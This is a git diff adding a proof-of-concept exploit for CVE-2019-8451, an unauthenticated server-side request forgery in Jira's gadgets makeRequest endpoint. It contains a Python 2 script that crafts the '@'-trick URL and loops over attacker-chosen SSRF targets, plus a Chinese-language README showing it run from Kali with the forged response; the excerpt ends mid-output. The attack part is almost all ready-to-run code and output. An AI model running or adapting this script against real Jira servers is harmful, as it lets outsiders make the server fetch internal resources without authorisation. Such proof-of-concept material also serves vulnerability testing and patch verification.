diff --git a/CVE-2019-8451/CVE-2019-8451.jpg b/CVE-2019-8451/CVE-2019-8451.jpg new file mode 100644 index 0000000..f4676ae Binary files /dev/null and b/CVE-2019-8451/CVE-2019-8451.jpg differ diff --git a/CVE-2019-8451/CVE-2019-8451.py b/CVE-2019-8451/CVE-2019-8451.py new file mode 100644 index 0000000..30a8330 --- /dev/null +++ b/CVE-2019-8451/CVE-2019-8451.py @@ -0,0 +1,41 @@ +import requests + +import sys + +# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/ + +def ssrf_poc(url, ssrf_url): + if url[-1] == '/': + url = url[:-1] + else: + url = url + + vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url + + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "*/*", + "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "X-Atlassian-Token": "no-check", + "Connection": "close" + } + + r = requests.get(url=vuln_url, headers=headers) + if r.status_code == 200 and 'set-cookie' in r.content: + print "\n>>>>Send poc Success!\n" + print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME') + print "\n>>>>vuln_url= " + vuln_url + '\n' + print r.content + else: + print "No Vuln Exit!" + + +if __name__ == "__main__": + + while True: + print + ssrf_url = raw_input(">>>>SSRF URL: ") + url = "http://www.jas502n.com:8080" + ssrf_poc(url, ssrf_url) + diff --git a/CVE-2019-8451/JRASERVER-69793.jpg b/CVE-2019-8451/JRASERVER-69793.jpg new file mode 100644 index 0000000..e3c6e54 Binary files /dev/null and b/CVE-2019-8451/JRASERVER-69793.jpg differ diff --git a/CVE-2019-8451/README.md b/CVE-2019-8451/README.md new file mode 100644 index 0000000..10b20d6 --- /dev/null +++ b/CVE-2019-8451/README.md @@ -0,0 +1,48 @@ +# CVE-2019-8451 Jira未授权SSRF漏洞 + +## python usage + +`python CVE-2019-8451.py http://www.jas502n.com:8080` + + + +``` +root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080 + +>>>>SSRF URL: www.baidu.com + +>>>>Send poc Success! + +X-AUSERNAME= anonymous + +>>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com + +throw 1; < don't be evil' >{"http://www.jas502n.com:8080@www.baidu.com":{"rc":200,"headers":{"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]},"body":"\r\n
<\/div>